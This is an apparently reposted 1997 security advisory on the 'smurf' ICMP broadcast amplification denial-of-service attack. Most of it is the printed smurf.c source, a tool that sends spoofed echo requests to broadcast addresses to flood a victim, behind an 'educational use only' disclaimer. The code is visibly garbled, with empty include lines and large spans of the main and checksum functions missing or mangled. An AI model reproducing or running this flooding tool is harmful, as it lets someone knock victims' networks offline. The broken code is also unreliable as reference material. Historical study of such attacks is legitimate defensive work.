TCP/IP FLOODING
Reported October 13, 1997 by TFreak
Systems
Affected
Any system employing TCP/IP
The
Problem
The smurf attack is quite simple. It has a list of broadcast addresses which it stores into an array, and sends a spoofed ICMP echo request to each of those addresses in series and starts again. The result is a devistating attack upon the spoofed IP. Depending on the amount of broadcast addresses used, many, many computers may respond to the echo request.
This attack can EASILY saturate a T1 circuit, rendering it completely useless.
HERE IS THE SMURF SOURCE CODE:
* $Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $*
* spoofs icmp packets from a host to various broadcast addresses resulting
* in multiple replies to that host from a single packet.
* disclaimer:
* I cannot and will not be held responsible nor legally bound for the
* malicious activities of individuals who come into possession of this
* program and I refuse to provide help or support of any kind and do NOT
* condone use of this program to deny service to anyone or any machine.
* This is for educational use only. Please Don"t abuse this.
* TFreak
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
void banner(void);
void usage(char *);
void smurf(int, struct sockaddr_in, u_long, int);
void ctrlc(int);
unsigned short in_chksum(u_short *, int);
/* stamp */
char id\[\] = $Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $;
int main (int argc, char *argv\[\])
\{
struct sockaddr_in sin;
struct hostent *he;
FILE *bcastfile;
int i, sock, bcast, delay, num, pktsize, cycle = 0, x;
char buf\[32\], **bcastaddr = malloc(8192);
banner();
signal(SIGINT, ctrlc);
if (argc h_addr, he->h_length);
sin.sin_family = AF_INET;
sin.sin_port = htons(0);
num = atoi(argv\[3\]);
delay = atoi(argv\[4\]);
pktsize = atoi(argv\[5\]);
if ((bcastfile = fopen(argv\[2\], r)) "#" || buf\[0\] 1) \{
*(u_char *)(&answer) = *(u_char *)addr;
sum += answer;
\}
sum = (sum >> 16) + (sum + 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
\}
Stopping the Problem:
MCI has a tool called DoSTracker that may help you track down Smurf users.
To learn more about new NT security concerns,
subscribe to NTSD.
Credit:
Reported by TFreak
Posted here at NTSecurity.Net October 12, 1997
|